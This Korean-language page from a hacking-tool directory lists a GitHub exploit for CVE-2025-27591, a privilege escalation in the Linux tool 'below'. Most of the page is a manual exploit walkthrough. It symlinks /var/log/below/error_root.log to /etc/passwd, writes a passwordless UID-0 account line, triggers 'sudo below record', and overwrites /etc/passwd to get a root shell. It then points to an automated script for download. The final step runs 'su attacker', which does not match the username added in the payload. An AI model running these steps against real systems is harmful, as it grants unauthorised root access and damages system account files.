Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/dollarboysushil/linux-privilege-escalation-cve-2025-27591
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration TestingRed Teaming
GitHubdollarboysushil/linux-privilege-escalation-cve-2025-27591

Linux-Privilege-Escalation-CVE-2025-27591

CVE-2025-27591은 Below 서비스(버전 < v0.9.0)에서 알려진 권한 상승 취약점입니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
721년 전아직 검토되지 않음

CVE-2025-27591 - below의 쓰기 가능한 심볼릭 링크를 통한 권한 상승

요약

이 문서는 CVE-2025-27591, below Linux 시스템 모니터링 도구의 로컬 권한 상승 취약점에 대한 간단한 익스플로잇입니다. 이 취약점은 v0.9.0 이전 버전에 영향을 미치며, 시스템의 잘못된 권한 할당에서 비롯됩니다. 이 문제는 2025년 1월에 발견되었고 2025년 3월 12일에 (SecurityOnline, OpenWall)로 공개되었습니다. below가 sudo로 실행되면 오류를 world-writable 디렉토리(/var/log/below)에 기록할 수 있으며, 공격자는 로그 파일을 /etc/passwd와 같은 민감한 대상에 심볼릭 링크할 수 있습니다.

이를 악용하면 below에 대한 sudo 접근 권한이 있는 비특권 사용자가 root로 권한을 상승시킬 수 있습니다.


취약점 세부 정보

  • CVE ID: CVE-2025-27591
  • 취약한 도구: below
  • 영향받는 기능: below record를 통한 로깅
  • 취약한 경로: /var/log/below/error_root.log
  • 공격 전제 조건:
    • /var/log/below 디렉토리가 world-writable 상태입니다
    • 공격자가 비밀번호 없이 sudo /usr/bin/below record를 실행할 수 있습니다

수동 익스플로잇 단계

✅ 1단계: world-writable 로그 디렉토리 확인 다음과 같이 표시되어야 합니다:

root@kitploit:~
drwxrwxrwx 2 root root 4096 ... /var/log/below

alt text

✅ 2단계: 기존 error_root.log 제거

root@kitploit:~
rm -f /var/log/below/error_root.log

✅ 3단계: /etc/passwd에 대한 심볼릭 링크 생성

root@kitploit:~
ln -s /etc/passwd /var/log/below/error_root.log

그런 다음 다음 명령으로 확인합니다

root@kitploit:~
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

alt text

✅ 4단계: 페이로드 파일 생성 이것은 비밀번호가 없는 새로운 root 사용자 attacker를 추가합니다:

root@kitploit:~
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload

파일 구조

root@kitploit:~
username:password:UID:GID:comment(home/full name):home_directory:shell

여기서 핵심은 UID와 GUID입니다. UID와 GUID를 0으로 설정하여 사용자를 root 사용자로 만들고 그룹 ID를 root 그룹으로 설정합니다. alt text

✅ 5단계: root로 로그 쓰기 트리거 이것이 익스플로잇의 핵심입니다.

root@kitploit:~
sudo /usr/bin/below record

이 명령은 실패하거나 시간 초과가 발생할 것으로 예상되지만, 실제로는 /etc/passwd인 /var/log/below/error_root.log에 오류 로그를 쓰려고 시도합니다. 💡 경우에 따라 이 작업만으로도 /etc/passwd가 손상될 수 있으므로, 다음 단계에서 완전히 덮어씁니다.

✅ 6단계: 심볼릭 링크를 통해 /etc/passwd 덮어쓰기

root@kitploit:~
cp /tmp/payload /var/log/below/error_root.log

alt text

✅ 7단계: root 되기

root@kitploit:~
su attacker

비밀번호 없이 root 셸에 진입하게 됩니다. alt text

자동 익스플로잇 단계

root@kitploit:~
python3 dbs_exploit.py

alt text

도구 다운로드